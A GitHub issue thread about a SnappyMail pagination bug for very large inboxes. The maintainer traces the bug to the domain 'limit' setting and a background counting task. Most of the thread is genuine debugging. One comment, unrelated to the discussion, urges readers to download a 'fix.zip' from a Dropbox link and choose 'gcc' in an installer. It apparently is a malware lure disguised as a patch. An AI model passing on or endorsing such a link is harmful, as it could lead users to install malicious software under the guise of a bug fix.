### ISSUE TITLE
INBOX pagination problem for large mailbox after 2.36.1

### ISSUE THREAD

**Issue by mohsensaeedi** [the-djmaze/snappymail#1716]
**Describe the bug**
After we upgrade to snappymail 2.36.2 found a bug for displaying page number for large inbox. some users have many emails on their inbox. I tested this with 2.37.2. bug started from 2.36.1. we have not any problem with 2.36.0

we can search the email are not shown on INBOX but page number don't show on bottom of page. 

**To Reproduce**
I login to INBOX with 28000 emails. We tested this bug with English and Persian. the behavior is the same. 

**Screenshots**
![image](https://github.com/user-attachments/assets/f15bea99-b93a-4a8c-83b8-2b5834dd2a80)

**Please complete the following information:**
- Browser: all browser
- IMAP daemon: dovecot
- PHP version: 7.4
- SnappyMail Version: 2.36.1 and above
- Mode: standalone

I can give you access to our test server if you haven't big mailbox.

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by the-djmaze** [comment]
Can you explain what is not working?

As i have it working with 2148 pages:
![afbeelding](https://github.com/user-attachments/assets/b869b876-0b33-4ae1-8468-83a5d7e90a1a)

**Comment by the-djmaze** [comment]
Are you using 64bit PHP?
See https://github.com/the-djmaze/snappymail/issues/830#issuecomment-1372112793

**Comment by the-djmaze** [comment]
You can also check the `MessageList` request response.
It should show `totalEmails` to work with.
![afbeelding](https://github.com/user-attachments/assets/3e351e46-44cc-40c2-aa3a-8a4216b9b6df)

**Comment by mohsensaeedi** [comment]
> Are you using 64bit PHP? See [#830 (comment)](https://github.com/the-djmaze/snappymail/issues/830#issuecomment-1372112793)

Yes and i tested different version on the same VM with same settings.

![image](https://github.com/user-attachments/assets/316ce78a-25f9-48f7-afaf-159f6cb8c153)

Screenshot for 2.36.4

**Comment by mohsensaeedi** [comment]
> You can also check the `MessageList` request response in the browser developer tools. It should show `totalEmails` to work with. ![afbeelding](https://private-user-images.githubusercontent.com/3752035/361776788-3e351e46-44cc-40c2-aa3a-8a4216b9b6df.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4Nzc2NTQsIm5iZiI6MTcyNDg3NzM1NCwicGF0aCI6Ii8zNzUyMDM1LzM2MTc3Njc4OC0zZTM1MWU0Ni00NGNjLTQwYzItYWEzYS04YTQyMTZiOWI2ZGYucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDgyOCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA4MjhUMjAzNTU0WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9YTkwNWQyNTlhZGE5N2MwNmIwODdmZWU2ZDU0ZDBlNmYwZDc1NzU5NTMyZTRkYzRkNzY2MDJjODg0Y2U1NmZkOSZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.9hcZrNtTeni1Vrv1q5ItBLAT9s8SEzCgt0ZyhpEmx18)

This screenshot for INBOX with about 30 K emails

![image](https://github.com/user-attachments/assets/56ab1455-037d-4191-9187-727605bb1fd6)

**Comment by the-djmaze** [comment]
Don't expand `@Collection`, look below it (like in my screenshot)

**Comment by mohsensaeedi** [comment]
> Don't expand `@Collection`, look below it (like in my screenshot)

![image](https://github.com/user-attachments/assets/bff5c9af-54ed-4e08-a007-64bf1c3b8c34)

**Comment by the-djmaze** [comment]
totalEmails says 0.
I will look into it

**Comment by mohsensaeedi** [comment]
> totalEmails says 0. I will look into it

Hi. Any update?

**Comment by the-djmaze** [comment]
Not yet. But the problem is the domain setting "limit".
Because you response has `limited: true`
In that case the count and sorting task runs in background (this was added to prevent long waiting/timeouts for the messages list).

If your IMAP server is fast enough, you could set limit to 0 and see if people prefer slower responses vs pagination.
Pagination does get updated in 15 minutes (default refresh setting, can be altered) if there are no new messages (else the background task is started again).

**Comment by the-djmaze** [comment]
I might have solved it.
It probably was due to the changes for #1507
